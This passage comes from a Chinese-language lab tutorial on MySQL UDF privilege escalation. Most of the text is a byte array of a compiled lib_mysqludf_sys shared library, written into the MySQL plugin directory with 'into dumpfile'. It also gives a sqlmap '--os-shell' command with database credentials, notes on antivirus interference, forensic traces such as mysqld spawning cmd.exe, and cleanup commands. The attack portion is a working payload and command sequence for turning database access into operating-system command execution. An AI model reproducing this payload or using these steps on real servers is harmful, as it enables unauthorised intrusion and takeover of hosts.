110, 103, 32, 116, 121, 112, 101, 32, 112, 97, 114, 97, 109, 101, 116, 101, 114, 0, 69, 120, 112, 101, 99, 116, 101, 100, 32, 101, 120, 97, 99, 116, 108, 121, 32, 116, 119, 111, 32, 97, 114, 103, 117, 109, 101, 110, 116, 115, 0, 69, 120, 112, 101, 99, 116, 101, 100, 32, 115, 116, 114, 105, 110, 103, 32, 116, 121, 112, 101, 32, 102, 111, 114, 32, 110, 97, 109, 101, 32, 112, 97, 114, 97, 109, 101, 116, 101, 114, 0, 67, 111, 117, 108, 100, 32, 110, 111, 116, 32, 97, 108, 108, 111, 99, 97, 116, 101, 32, 109, 101, 109, 111, 114, 121, 0, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 32, 118, 101, 114, 115, 105, 111, 110, 32, 48, 46, 48, 46, 52, 0, 78, 111, 32, 97, 114, 103, 117, 109, 101, 110, 116, 115, 32, 97, 108, 108, 111, 119, 101, 100, 32, 40, 117, 100, 102, 58, 32, 108, 105, 98, 95, 109, 121, 115, 113, 108, 117, 100, 102, 95, 115, 121, 115, 95, 105, 110, 102, 111, 41, 0, 0, 1, 27, 3, 59, 152, 0, 0, 0, 18, 0, 0, 0, 64, 251, 255, 255, 180, 0, 0, 0, 65, 251, 255, 255, 204, 0, 0, 0, 66, 251, 255, 255, 228, 0, 0, 0, 67, 251, 255, 255, 252, 0, 0, 0, 68, 251, 255, 255, 20, 1, 0, 0, 71, 251, 255, 255, 44, 1, 0, 0, 72, 251, 255, 255, 68, 1, 0, 0, 226, 251, 255, 255, 108, 1, 0, 0, 202, 252, 255, 255, 164, 1, 0, 0, 243, 252, 255, 255, 188, 1, 0, 0, 28, 253, 255, 255, 212, 1, 0, 0, 134, 253, 255, 255, 244, 1, 0, 0, 182, 253, 255, 255, 12, 2, 0, 0, 227, 253, 255, 255, 44, 2, 0, 0, 2, 254, 255, 255, 68, 2, 0, 0, 22, 254, 255, 255, 92, 2, 0, 0, 132, 254, 255, 255, 116, 2, 0, 0, 147, 254, 255, 255, 140, 2, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 1, 122, 82, 0, 1, 120, 16, 1, 27, 12, 7, 8, 144, 1, 0, 0, 20, 0, 0, 0, 28, 0, 0, 0, 132, 250, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 52, 0, 0, 0, 109, 250, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 76, 0, 0, 0, 86, 250, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 100, 0, 0, 0, 63, 250, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 124, 0, 0, 0, 40, 250, 255, 255, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 148, 0, 0, 0, 19, 250, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 36, 0, 0, 0, 172, 0, 0, 0, 252, 249, 255, 255, 154, 0, 0, 0, 0, 66, 14, 16, 140, 2, 72, 14, 24, 65, 14, 32, 68, 14, 48, 131, 4, 134, 3, 0, 0, 0, 0, 0, 52, 0, 0, 0, 212, 0, 0, 0, 110, 250, 255, 255, 232, 0, 0, 0, 0, 66, 14, 16, 71, 14, 24, 66, 14, 32, 141, 4, 142, 3, 143, 2, 69, 14, 40, 65, 14, 48, 65, 14, 56, 131, 7, 134, 6, 140, 5, 71, 14, 80, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 12, 1, 0, 0, 30, 251, 255, 255, 41, 0, 0, 0, 0, 68, 14, 16, 0, 0, 0, 0, 20, 0, 0, 0, 36, 1, 0, 0, 47, 251, 255, 255, 41, 0, 0, 0, 0, 68, 14, 16, 0, 0, 0, 0, 28, 0, 0, 0, 60, 1, 0, 0, 64, 251, 255, 255, 106, 0, 0, 0, 0, 65, 14, 16, 134, 2, 68, 14, 24, 131, 3, 71, 14, 32, 0, 0, 20, 0, 0, 0, 92, 1, 0, 0, 138, 251, 255, 255, 48, 0, 0, 0, 0, 68, 14, 16, 0, 0, 0, 0, 28, 0, 0, 0, 116, 1, 0, 0, 162, 251, 255, 255, 45, 0, 0, 0, 0, 66, 14, 16, 140, 2, 78, 14, 24, 131, 3, 71, 14, 32, 0, 0, 20, 0, 0, 0, 148, 1, 0, 0, 175, 251, 255, 255, 31, 0, 0, 0, 0, 68, 14, 16, 0, 0, 0, 0, 20, 0, 0, 0, 172, 1, 0, 0, 182, 251, 255, 255, 20, 0, 0, 0, 0, 68, 14, 16, 0, 0, 0, 0, 20, 0, 0, 0, 196, 1, 0, 0, 178, 251, 255, 255, 110, 0, 0, 0, 0, 68, 14, 48, 0, 0, 0, 0, 20, 0, 0, 0, 220, 1, 0, 0, 8, 252, 255, 255, 15, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 28, 0, 0, 0, 244, 1, 0, 0, 255, 251, 255, 255, 65, 0, 0, 0, 0, 65, 14, 16, 134, 2, 68, 14, 24, 131, 3, 71, 14, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 255, 255, 255, 255, 255, 255, 255, 255, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 178, 1, 0, 0, 0, 0, 0, 0, 12, 0, 0, 0, 0, 0, 0, 0, 160, 11, 0, 0, 0, 0, 0, 0, 13, 0, 0, 0, 0, 0, 0, 0, 120, 17, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 88, 1, 0, 0, 0, 0, 0, 0, 245, 254, 255, 111, 0, 0, 0, 0, 160, 2, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 104, 7, 0, 0, 0, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 96, 3, 0, 0, 0, 0, 0, 0, 10, 0, 0, 0, 0, 0, 0, 0, 224, 1, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 232, 22, 32, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 128, 1, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 23, 0, 0, 0, 0, 0, 0, 0, 32, 10, 0, 0, 0, 0, 0, 0, 7, 0, 0, 0, 0, 0, 0, 0, 192, 9, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 96, 0, 0, 0, 0, 0, 0, 0, 9, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 254, 255, 255, 111, 0, 0, 0, 0, 160, 9, 0, 0, 0, 0, 0, 0, 255, 255, 255, 111, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 240, 255, 255, 111, 0, 0, 0, 0, 72, 9, 0, 0, 0, 0, 0, 0, 249, 255, 255, 111, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 64, 21, 32, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 206, 11, 0, 0, 0, 0, 0, 0, 222, 11, 0, 0, 0, 0, 0, 0, 238, 11, 0, 0, 0, 0, 0, 0, 254, 11, 0, 0, 0, 0, 0, 0, 14, 12, 0, 0, 0, 0, 0, 0, 30, 12, 0, 0, 0, 0, 0, 0, 46, 12, 0, 0, 0, 0, 0, 0, 62, 12, 0, 0, 0, 0, 0, 0, 78, 12, 0, 0, 0, 0, 0, 0, 94, 12, 0, 0, 0, 0, 0, 0, 110, 12, 0, 0, 0, 0, 0, 0, 126, 12, 0, 0, 0, 0, 0, 0, 142, 12, 0, 0, 0, 0, 0, 0, 158, 12, 0, 0, 0, 0, 0, 0, 174, 12, 0, 0, 0, 0, 0, 0, 190, 12, 0, 0, 0, 0, 0, 0, 128, 23, 32, 0, 0, 0, 0, 0, 0, 71, 67, 67, 58, 32, 40, 68, 101, 98, 105, 97, 110, 32, 52, 46, 51, 46, 50, 45, 49, 46, 49, 41, 32, 52, 46, 51, 46, 50, 0, 0, 71, 67, 67, 58, 32, 40, 68, 101, 98, 105, 97, 110, 32, 52, 46, 51, 46, 50, 45, 49, 46, 49, 41, 32, 52, 46, 51, 46, 50, 0, 0, 71, 67, 67, 58, 32, 40, 68, 101, 98, 105, 97, 110, 32, 52, 46, 51, 46, 50, 45, 49, 46, 49, 41, 32, 52, 46, 51, 46, 50, 0, 0, 71, 67, 67, 58, 32, 40, 68, 101, 98, 105, 97, 110, 32, 52, 46, 51, 46, 50, 45, 49, 46, 49, 41, 32, 52, 46, 51, 46, 50, 0, 0, 71, 67, 67, 58, 32, 40, 68, 101, 98, 105, 97, 110, 32, 52, 46, 51, 46, 50, 45, 49, 46, 49, 41, 32, 52, 46, 51, 46, 50, 0, 0, 46, 115, 104, 115, 116, 114, 116, 97, 98, 0, 46, 103, 110, 117, 46, 104, 97, 115, 104, 0, 46, 100, 121, 110, 115, 121, 109, 0, 46, 100, 121, 110, 115, 116, 114, 0, 46, 103, 110, 117, 46, 118, 101, 114, 115, 105, 111, 110, 0, 46, 103, 110, 117, 46, 118, 101, 114, 115, 105, 111, 110, 95, 114, 0, 46, 114, 101, 108, 97, 46, 100, 121, 110, 0, 46, 114, 101, 108, 97, 46, 112, 108, 116, 0, 46, 105, 110, 105, 116, 0, 46, 116, 101, 120, 116, 0, 46, 102, 105, 110, 105, 0, 46, 114, 111, 100, 97, 116, 97, 0, 46, 101, 104, 95, 102, 114, 97, 109, 101, 95, 104, 100, 114, 0, 46, 101, 104, 95, 102, 114, 97, 109, 101, 0, 46, 99, 116, 111, 114, 115, 0, 46, 100, 116, 111, 114, 115, 0, 46, 106, 99, 114, 0, 46, 100, 121, 110, 97, 109, 105, 99, 0, 46, 103, 111, 116, 0, 46, 103, 111, 116, 46, 112, 108, 116, 0, 46, 100, 97, 116, 97, 0, 46, 98, 115, 115, 0, 46, 99, 111, 109, 109, 101, 110, 116, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 15, 0, 0, 0, 5, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 88, 1, 0, 0, 0, 0, 0, 0, 88, 1, 0, 0, 0, 0, 0, 0, 72, 1, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 11, 0, 0, 0, 246, 255, 255, 111, 2, 0, 0, 0, 0, 0, 0, 0, 160, 2, 0, 0, 0, 0, 0, 0, 160, 2, 0, 0, 0, 0, 0, 0, 192, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 21, 0, 0, 0, 11, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 96, 3, 0, 0, 0, 0, 0, 0, 96, 3, 0, 0, 0, 0, 0, 0, 8, 4, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 29, 0, 0, 0, 3, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 104, 7, 0, 0, 0, 0, 0, 0, 104, 7, 0, 0, 0, 0, 0, 0, 224, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 37, 0, 0, 0, 255, 255, 255, 111, 2, 0, 0, 0, 0, 0, 0, 0, 72, 9, 0, 0, 0, 0, 0, 0, 72, 9, 0, 0, 0, 0, 0, 0, 86, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 50, 0, 0, 0, 254, 255, 255, 111, 2, 0, 0, 0, 0, 0, 0, 0, 160, 9, 0, 0, 0, 0, 0, 0, 160, 9, 0, 0, 0, 0, 0, 0, 32, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 1, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 65, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 192, 9, 0, 0, 0, 0, 0, 0, 192, 9, 0, 0, 0, 0, 0, 0, 96, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 75, 0, 0, 0, 4, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 32, 10, 0, 0, 0, 0, 0, 0, 32, 10, 0, 0, 0, 0, 0, 0, 128, 1, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 10, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 85, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 160, 11, 0, 0, 0, 0, 0, 0, 160, 11, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 80, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 184, 11, 0, 0, 0, 0, 0, 0, 184, 11, 0, 0, 0, 0, 0, 0, 16, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 91, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 208, 12, 0, 0, 0, 0, 0, 0, 208, 12, 0, 0, 0, 0, 0, 0, 168, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 97, 0, 0, 0, 1, 0, 0, 0, 6, 0, 0, 0, 0, 0, 0, 0, 120, 17, 0, 0, 0, 0, 0, 0, 120, 17, 0, 0, 0, 0, 0, 0, 14, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 103, 0, 0, 0, 1, 0, 0, 0, 50, 0, 0, 0, 0, 0, 0, 0, 134, 17, 0, 0, 0, 0, 0, 0, 134, 17, 0, 0, 0, 0, 0, 0, 221, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 111, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 100, 18, 0, 0, 0, 0, 0, 0, 100, 18, 0, 0, 0, 0, 0, 0, 156, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 125, 0, 0, 0, 1, 0, 0, 0, 2, 0, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 0, 0, 0, 0, 19, 0, 0, 0, 0, 0, 0, 20, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 135, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 24, 21, 32, 0, 0, 0, 0, 0, 24, 21, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 142, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 40, 21, 32, 0, 0, 0, 0, 0, 40, 21, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 149, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 56, 21, 32, 0, 0, 0, 0, 0, 56, 21, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 154, 0, 0, 0, 6, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 64, 21, 32, 0, 0, 0, 0, 0, 64, 21, 0, 0, 0, 0, 0, 0, 144, 1, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 163, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 208, 22, 32, 0, 0, 0, 0, 0, 208, 22, 0, 0, 0, 0, 0, 0, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 168, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 232, 22, 32, 0, 0, 0, 0, 0, 232, 22, 0, 0, 0, 0, 0, 0, 152, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 177, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 128, 23, 32, 0, 0, 0, 0, 0, 128, 23, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 183, 0, 0, 0, 8, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 136, 23, 32, 0, 0, 0, 0, 0, 136, 23, 0, 0, 0, 0, 0, 0, 16, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 188, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 136, 23, 0, 0, 0, 0, 0, 0, 155, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 35, 24, 0, 0, 0, 0, 0, 0, 197, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0) into dumpfile '/usr/local/mysql/lib/plugin/lib_mysqludf_sys_64.so'; 

剩下的就和16进制写入一样了

8.1.3 sqlmap

使用以下命令进行提权

sqlmap -d "mysql://evil:Abcd1234@192.168.26.139:3306/mysql" --os-shell

选择了正确的位数后便提权成功,可以看到是 www 权限

0x09 实验环境 6

  • 系统:CentOS 7.9 x64
  • 数据库:MySQL 5.7.26

9.1 利用方法

9.1.1 16进制写入

与 实验环境 5 一样

9.1.2 ascii 码写入

与 实验环境 5 一样

9.1.3 sqlmap

与 实验环境 5 一样

0x0A 其他情况

A.1

可能是因为 mysql 版本的原因,以上环境用 msf 都没有利用成功。

A.2

如果有杀软(比如360),我们创建好函数sys_eval后,在执行命令时(比如 whoami),会被360拦截。

0x0B 痕迹

B.1 进程

写入文件时,出现了这些进程,可以看到,mysqld.exe 对C:\phpstudy\Extensions\MySQL5.5.29\lib\plugin目录写入了lib_mysqludf_sys_64.dll

创建sys_eval函数时,出现了这些进程,可以看到,mysqld.exe 截断了C:\phpstudy\Extensions\MySQL5.5.29\data\mysql\func.MYDC:\phpstudy\Extensions\MySQL5.5.29\data\mysql\func.MYI,打开了注册表键HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SideBySide

sys_eval函数执行whoami命令时,出现了这些进程,mysqld.exe 创建了进程C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe又创建了进程C:\Windows\system32\whoami.exe,进程C:\Windows\system32\whoami.exe获取到用户信息以后退出进程,进程C:\Windows\system32\cmd.exe接着退出。

B.2 文件

写入的文件为C:\phpstudy\Extensions\MySQL5.5.29\lib\plugin\lib_mysqludf_sys_64.dll,可以在创建用户以后远程登录上去删除

B.3 函数

为了执行系统命令,我们创建了sys_eval函数,可以用以下命令删除

# 删除sys_eval函数DROP FUNCTION sys_eval;# 查看是否删除成功select * from mysql.func where name = 'sys_eval';

0x0C 踩坑记录

C.1

用x32还是x64的 udf 文件取决于系统的位数,而不是 MySQL 的位数

C.2

MySQL 5.7.26只能通过 webshell 或者其他方法来创建插件目录,无法通过 NTFS ADS 流模式突破来创建,会报错,如图,但写文件是可以的

0x0D 参考

Mysql Udf提权

MySQL 漏洞利用与提权

Mysql提权-基于Mysql的UDF提权(Linux系统)

如何使用mysql数据库udf提权